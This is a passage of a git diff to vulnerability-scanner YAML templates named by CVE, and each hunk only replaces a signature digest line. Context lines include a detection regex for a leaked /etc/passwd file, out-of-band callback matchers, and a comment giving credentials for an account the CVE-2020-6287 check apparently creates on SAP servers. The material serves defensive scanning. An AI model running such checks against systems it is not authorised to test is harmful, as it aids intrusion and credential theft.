490a0046304402202a8db0b365a92e35265e6962dff06f02188baa4d4ade5d78b973ce64a0455b6202201ba13d07b7cd968c77e9792b84fcb3c49c5b09d4e4271bb7ec4b34703ad5dafc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db23f634e82fa4cfd0a844b63fb437660d2c2638b597a4ae0a460771ce8c1db902204c7a29e689d1e2964b884249d9f7a34978cb6c37ff79ff618bde246f59eff6f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35131.yaml b/http/cves/2020/CVE-2020-35131.yaml index 235feb506fa..4fa46b75d37 100644 --- a/http/cves/2020/CVE-2020-35131.yaml +++ b/http/cves/2020/CVE-2020-35131.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100af7dd3d496fb185e63b21e96c0408c3dd4e885b12aa28b65cd76e3202427da55022054c7663c0e59dc888a8159be4f0b77ab96098cf72375646c77d31fd01c2d3714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210098d04f89a80ef0bb6e947ec9a3f14e534accd8c168f1318240f91c4aa92eafe8022100a1a749b12a2094d1fa14d514a59dcd09d0e3ced7f068f3e579dcb253a421257d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index f693f778a98..301f0ef8f5e 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008d72f63344ba4db9a8f74cee5871d6aa6a10fc579668fadb9a3c19c6f48f36ea022018cbeb5d27681b8bac509ca372e7b6d29c9a4c92c08af33acaaea0ad9ddbb20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b75e2bf4986da6ad76b894f4763cc63502f55e770e1f4dfe7cfcd612637accb022100b5a0fca9a88a312a6feee7c030a3f8f14f411435dbc40bfc76a4879b9e11bfbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 64e17f97ab1..64230476ea2 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203e2d5364ed996f0d44bbbbd508cb0f8e52d6d53a29b61dfa75e6e7414608b8a0022100b61960f931197d542207cb7713f7488cd442e6d683aad2ba9d01f7b799e8d1f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c95fc228a69164f459cdc88e0b7c931eaa96d31f4cedd3a546113d278877914c022100dd67b3a9b898047a2cf2f235c3f67ecedbb3f791396e29d5fa87f5adef2ff201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 2f893111d54..bd1a4824ae3 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c12fc2c51e68a004507e4d760abdc1b95f0ef154094b68488836506360761e1022100d3c9954f2d311ca712714b745de17ef98f6d73023b7afc1828adbb6735a34a5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ead308a6dda79f6550d2dfc0e3e949b5081fb3f891e9acc5706510dbed07e3802207d1e4174b64c16dc97ca90157dc9cc5454014b3d71a5f819efc0b1c0eff83f8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 1fff889e105..bd83f2634f4 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c73f803e86cd462d21177fe8e89b3bc214aae4976c73e0768c4072437e7901ac02203b7aa6d5d796b6fb4b36da2ff606d9ae4906baaff30c480c5634dfd072cfa4d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022008f2c06d4a010216ce064ebf0af4d1981a9ddd1dbdd449e0fd8d5e51c15acde102203fe6397c7f145e190bc4279105d06145ec9334dd601599bc354a5c817cb480b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 29c55472288..e229d7e983d 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da229b5291f2dbe7d36d0dd1a8e35626a3e9ce26d42ec3ca9abf986e8ccbb137022058b59f8257da6d5e9e161c08b63d0cb03ca0e192c4eb5c887f942d4a4c377dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b6126389bcf96d35a44081248838f23db53e0159e7f4fbc68aa6cfa59573cd30220543b533e4a88fad37010d24f4d8dc0ed736f83c1cdbdd1947ed407134ae7eac7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index a5974f7ea55..563201acc32 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022046e806f6d48af0b4911e8402a2d5a3e9210ac416361b08a622838e18f377cc6e022002e2e48e2621b759ca76ae55c4e565b6cdecc6356573ebf15493840ef2ef695f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c85a6530e56b7d711517a396c6ccc8eaf4a178806a818131c9218a1c3593ab802200fb882d9cceab0d2dfefbddccd82e766fad04bfa48d6bec5bca0821bd5f0dd8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index b323a875cc4..777997cad2d 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a004830460221008f7340c6ebcdc10e73c4e27592f43ba85e339a444278785e592e288dee876350022100d8a70ccb1484141ac8a29e0cc4d4e398b481e55e68835479a71424a0603439bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207463cb1c39b468b9c1c0a1d0da86d2446235b290f6139d171158a335544a3a2c022100e048c5eb24046ffb25b4d3332c9c7b0355afe9a3a7c51ef4feab67eab5129a35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 6a8c8e09a59..54748a9f09d 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100c35e60c949874599f5957e5ff6e76a62e2498411e151dd55e87afd0838316d63022100b42024dc1d2ef244d1293489f386ebaaae3edad0f7452d85641b30653da4f697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220127b2e7a6c046c255a2ae81d54be5940382b730520cd220a6eb30d065a16aa3b0220716f0e21616507bfd4d81cc2bacffbcc3d6915e475c53c42204c4b20b524157e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36333.yaml b/http/cves/2020/CVE-2020-36333.yaml index f992c7fec8d..873a128a281 100644 --- a/http/cves/2020/CVE-2020-36333.yaml +++ b/http/cves/2020/CVE-2020-36333.yaml @@ -41,4 +41,4 @@ http: - 'status_code == 302' - 'contains_all(header, "wordpress_logged_in_", "reset=true")' condition: and -# digest: 490a004630440220721e85954427510150c2b6ec8c93102c1621d0a7f97d2d49e22f48c9aeafc2fb022073ee170f04821b96c91f8556d37b1d8264f63cdc5d163d36cd8bb6d2e85961cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c879864fca682a2575c3d94dfd962bacad5d95cdb6519247dd35bc337d39d7b4022100ab411d9768eaf1bfbd4338721e420893eac6b5b169d5959d15f2c436efd4cf49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index bcf8503a5eb..dab55f37461 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100c67f71cbb4fd8369173a83bb455d249e3658d81c6085f365ea4f981672e643b7022051c7cc7863ac282aaf9e213d27a637c09ec23a49fb5baed357bc079a4aa58e17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206178dcc1d38c045914e0e3a479863ec35c447189539d691bc7579c1f7a088f64022008b03406474bcc6e86c84eb74fb8138da2c2e1759f261e2beb6167cd91081eca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index e1a1f165b6a..caadfba1371 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009288cf50e1e96a4d35d3cc4d927fd383b777291e5d5e451504e690ebecaf462e0221009cf7466a6f16c6a7c49a1b0888250c5e3a04cb69acf1a978906d4f49c4ef31a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096e9594adf34520b6867060974440db602e11d06113f01f7f194bab703784f9c0221008b74112e28aecd0baefa887e69932e3583c11256f9a63269fad75fcfd5f64c8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36723.yaml b/http/cves/2020/CVE-2020-36723.yaml index ac8cbedb9e3..63a4da8a620 100644 --- a/http/cves/2020/CVE-2020-36723.yaml +++ b/http/cves/2020/CVE-2020-36723.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b6fed6278366669942b33eed640e76552dee96c3a5dbf753c727df2e8f2fc622022100c3939046662ab3cba7aac738c3b322ec6aa21a64a46d5d916d8f5e7cdb285235:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009388e01896e685cf306791ef6e06782956c00542493950ff3f7ecb8f466292d502200e4debd0986430037d8dbf8a3fcd7c96e0ece33a25383bfd77a5f29c3d58e9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36728.yaml b/http/cves/2020/CVE-2020-36728.yaml index 9d1401bdf82..e12116d85d2 100644 --- a/http/cves/2020/CVE-2020-36728.yaml +++ b/http/cves/2020/CVE-2020-36728.yaml @@ -77,4 +77,4 @@ http: - "status_code == 200" - "contains(body, '{{marker}}')" condition: and -# digest: 4b0a00483046022100cda5db4e7cc98c8761b6885dff614b4c8597b9414570a47c2e04871005766741022100851dbda2f968cfbba50e33cb142eb9ce7e945e75ec6826c3c0b69867d8e6a579:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e647bb0c319986d16cc25cc6395508cc9bd99b86c106403d944c93154f4637f022100f812f1cca5cd93df6fca8dbef0f2d3c372aef20ce2eaf8ba6cd1b1e145389f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36836.yaml b/http/cves/2020/CVE-2020-36836.yaml index a041ce531d1..d9eba9dba5c 100644 --- a/http/cves/2020/CVE-2020-36836.yaml +++ b/http/cves/2020/CVE-2020-36836.yaml @@ -94,4 +94,4 @@ http: dsl: - "status_code == 404" internal: true -# digest: 4a0a00473045022100ad44dedd3fca7e63e6612742c424b0c4628e3d3915dc2ddca7571af9d6724d5202204305bb439c7eff83c702ed812e6cff403ac55a2298bbd8f488589cac5cdb4208:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ecf810cc81a60a779319ffe1d46e021677db760c00088753c6e52582e6e7c81e02210095d0ac39d45a27b7af2039c28bcad40d2010e6d8035e9be3447cded0b4298e45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index cab3101a95e..3886287ba9e 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200cf46db4a990469d14b96954c823686637166f52b989c6424514a2306652ab550220016357941919a3bbaa7cee3344d5c675608785a3104f4c9a2f423e2ec2dfe459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049edb9ccde1935752d026f048ef22d8223915f2bfebcd730b5f102264049e627022100ffa9286283185ffeaebb483c8b3693b50b3172c77d8d4e05901d56137107e747:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index fbc74a5e63c..9893458564e 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b4a0149ea5a6ae105f96e7e4cd0c6a2aca380cd65d0db4dee6ff8d9e934eca15022100b62b574c9bb591c4c11469a45800f78f496a6ff7948cef6dbf75223d7788d4f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220793f824ba1e70c84fe4919f1c9213609760b33c53e292e7e6819a19755800edc022100f0691200d0232642fe11287c5f9e22a7d5cfff9caa7a863c831708b52cc64571:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 6a4588e6965..ee82025c4eb 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -38,4 +38,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100fa488b962dfba35b09c345d8178f8fe659f4a1ccf9fc6d17fec1aeca2bd08945022100bccdf6e8c9724e8aeccd1d7015647340eb72a2d79ce1470c93b3285551d44fed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aba94592304d0af43b1040036f7209d330747b7be9b04ccca0b44673c2e856e902200c08ecfb9395cfd5ba581e0eecd90aa7c461c4b34e1ffa290948cd1a41404697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 4fb66c62a00..1736d877dd0 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a96e75a0f47d003f84cf35a20051adac3ea12c3ad048481c8fd252903216d61022100bee7870bc49ed38e3f99190c2cec31c883c86ac2611765ff1b5e4e6c29d424c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c7bee764afc0acd890db7192c3c93f0a5e2e858d0f11678d578c20745553d91022100ee6169563754910db026c7ed2ccf69569bf4f3b04546ff0e9fd3f01c2c829dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index da9c21374de..a22350e5dc0 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 503 -# digest: 4a0a0047304502203ed496c87fd7d5327fe55d3030987042ae76f6e62efefeb2169bbd5912688ba7022100fe80c3ed381cad7fb6854ed8ec1eac672801210dddb5f73e3c2db5357bc28856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e29173f75601373bae0ba4cf3b3e7591ffccc2fab394cc1cacd0d0aabb57282b022063adf2e18b74a2f7f369fe46acfe08af58fb8f3237932db9d62e641cbee2549f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index ddb919d4ccf..a24571935fd 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -64,4 +64,4 @@ http: # userName - sapRpoc6351 # password - Secure!PwD8890 -# digest: 4a0a00473045022100fd1db3798732bb63646e444b90d80872a6dc88df9b7b450a51c9541d422311dd02206f4a6123a322232a94d93cc8a69670dc17a3a061a7b944aa3895bec5a767d503:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0ff3aabaa0bf6e3de91abd5de1bc765adcfc605c4a347e3a3a65589b973ee95022100dfca021f88ec74ff32ff1e8ef71ba52f9e2b8eacee987a363ef098864a4be183:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 13862b749ac..7e32b0cc44f 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -50,4 +50,4 @@ http: part: location words: - "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp" -# digest: 4b0a00483046022100d4686ee0bc340864bbc229fbc101c6d938e86a02f9eee4e2ae4a481d4320cd380221009ade8ba83868cec8915ced9c9522bbd0e68e37e11e71bfd0ee01e0af8c03130d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fffe5c12a48a32c12e27dbeb8d0796d0b9ad243c431af0bf3091b601fe7991eb022100af9bd5faaa68241d5c4dfb39b134aec0d77468feffb803f4c7ee6475de9d9c03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index 259837fe9cf..d76f2f54932 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205af79bcf6620cec03c3d94db140776ad72406bfc6b2ce902f7894f660839dafe02210087de0ba167f90dada021775805691e5a452db38291cc90a32f69483fd7ba75b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009d1ec45c6277f30f9a389f522066a356f19b5761ffa19050d59c9527aad483c0022100e277e21f2071c81f1148ce840cafa69a1fdc94aabfe8a72e86adb27a5b49c0d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 4001578210e..62437723a02 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -39,4 +39,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022017a49505e42203611b53e418cffedf3a9f5d71b1ed7a6d03687612699e534a9b0221009b7e52d99bf589fd7216fa91a76bee6de4473cbd62977d6e2fc921a4f39df2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5fb7dc50357e3b70fe6ada1b5c2dab5806cd473f55fcfd0ceca0cec5fee9eaf02207b45a8f729edc5aed39305ebf8917f9a1275ee28ab7cf7979f09bb88b513db02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index efa612e7712..7340389b6be 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d25858a16ff597c90edc4b68e72da97aec2371a790a21a37acc7613833aba1cb022100fa3e0c5beb4fe9d78d73e4a5e4319e2a5180899b424ef8ec5fddcf5c60c9cc20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c05ba1d88f9fc9c6607d7bfa7251c1b9f92ab65c46909d5843c5abf22c2429e6022100f921bd7bd2984fe5334bf44f9b98e438517666a3cd35d27c9dd742aa2336d876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 54bd4bc23da..31a99b99b28 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -49,4 +49,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402206e710478548c307a14ab2df4edc778e1fd2c77f8e265a0b9d07d571cd9eed322022054a17471c7eefd89bd4e71d097b3db3cdc3978437eda8aa311ecc66a38780ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210095a6c5634aec0492194bc1b45891d1a784db06c8d0902026100c1dd3bcca37bc022100c6e4cde5b60a42e3f82e236fbdd2a1e9126095401e89d43065296c6eed259c96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index cfff9e06108..69429e5bbff 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f8266b6a5fa972723e8b783afc58f248c3af65c9210de123e1c63ea8481a3f51022100970bb0048138ea29f9c31f1850361d8e1933f55c778abbbd6ca8b69e5d9dd396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a159d7f015f71b7eaf6634d9a7b195d95840f9e7c548f6adf0577e094fbb2ec022100f4aa4da44a8178dc64f768eb1c730b4ece1caacad94e78b83447e195ca93d877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 7df2a4e361a..a969a0326eb 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b66e94cd7f497b97b772de3227ebb5eb57f5730b367b374e9708d29e16a0fcc9022044dab4da68348490a9c06fb1ffa734c071c08b22551ada1b0c9de6287d10fdbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e69e5c9f39b451351ce13d1f388c65c55f74e2921c5409c175d02b0f7ffe57f202205afe3c61d766ef2be2747a344f1abaaf067b4f9fa103f3a5e6e7e96a009d4246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index bece84a2156..85cbbac96dc 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e3f7ec44e6ea7f94d3d5835ba8a7a3d7f9cb93775412c5fc421ac32241e0242c022100aea41b37a2d9549fa6f41629eebe11ce15f820c5476c6f793762a96fe9eb91e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204dcd5f95d127967f9b95408248ffd8fe4f4ca21a3d3e05f69581bb50f486aaa6022100812831fe82e5f20df481a2d95c81b1c6ee8d92466bc025dd9ac516cf90cba402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index 3e99b109532..e6586cddfa4 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022044b85c9493aad2ea6a723cd7793010ff4f9304c03e87484303c4742751ef29fc022100fda55b6560b0e84a5428a583ab9885fa8aca200772e6af0b5c4b9e532ced66af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038456c5703b334725c331e608b7af8b68f5c91748a18045106219f9d070d00d1022100ae8f8729f3c42868623215cbb6c77e911976b9d5ed1c9b9d89ac03089bcbf9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 512d3423163..e376e258617 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ccf73363be7de51a1b0843510464bd37e2635047e0380d8e984a1d699ed76ecb02204fc916fea1fb9fffb9165c558689f0ac6ae4ae340f7b76d017e8385fabdf7042:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220602965a156b77f7bd1bd278c7112a887bcc544586b6e143e4a2d2ad75a6ee79b0221009c884e39845cc20a90960a30cd3509021776928d83edcf34f7678426d43cfdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index db525bda7b2..683565750a5 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210092b709a38b673afe4835b5f0899e47173af668dd1d6daf9f700f8985cf96d945022100feb40be3692d10b6d1b699a4e1f356207ca2589420ec764c4d0a9b735e85bc4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204c9183246821b28897e35886cc01bce154c3a7e50783aa6b70d3f23159be9b90022100fdad5784f7582b4d0e4755ab38c9bb3877c7711ec66f16ddb566f79b06209f0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index e1fab448ac8..f13a0415cc4 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -65,4 +65,4 @@ http: - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input attribute: value part: body -# digest: 4a0a00473045022055c60d601ac0c4acf4035f204d4b1b7eed711cd9afd30c0e10ca090b2953024f022100cc5e8196b41e3b452e5cd9bacf3c157ea4c60229051e61ae5e66f679c5be751d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220095a92dbf328b23f7ed8ab6e25bcfcb5654b3bf3418b39f98b9400b454bb6a0c0220183b014dbe35131664430ddf72af9b718451f5d84616e3a6d168eed02e1957a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index 295cc1c69fa..69e7e537142 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -57,4 +57,4 @@ http: - "# VERSION : ([0-9.]+)" internal: true part: body -# digest: 4a0a00473045022100c057813456a8db6465b5548563bcf76a5cf12e7a489fdc0892b35b232a37916002201d751ecc67800ef718be588bfade3224fdce934cb5008af5dc15289c46aa0820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fedf763b52f27a97035b8ed3f66edb3e114f056fa46faf4cb9df4ff02eb01b6c022100f441f494db1e9ea6b4affa6e8aa8a358ee51c3308af04ce834874995b62f2f0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8657.yaml b/http/cves/2020/CVE-2020-8657.yaml index 40450d296b8..ee251163265 100644 --- a/http/cves/2020/CVE-2020-8657.yaml +++ b/http/cves/2020/CVE-2020-8657.yaml @@ -69,4 +69,4 @@ http: - type: dsl dsl: - '"Username: " + username + ". Password: "+ password' -# digest: 4a0a00473045022100a7efab23b7c0ae2e60343c4bcc80d48643a553be04492b4cfaa25aab2367f85b0220339996bbba729dca76be01fb76c65cc7dbda6aa057253908e1ab7eb05fbee436:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206b50c3e40cce72bf825ea834feb90b2fa941eb44aafd045e372f885f6ae1c05202201b2f8665ba29722f27b1e847c8e0dc42cfd0c8e0cf097e622c52dd2c64e2d899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index 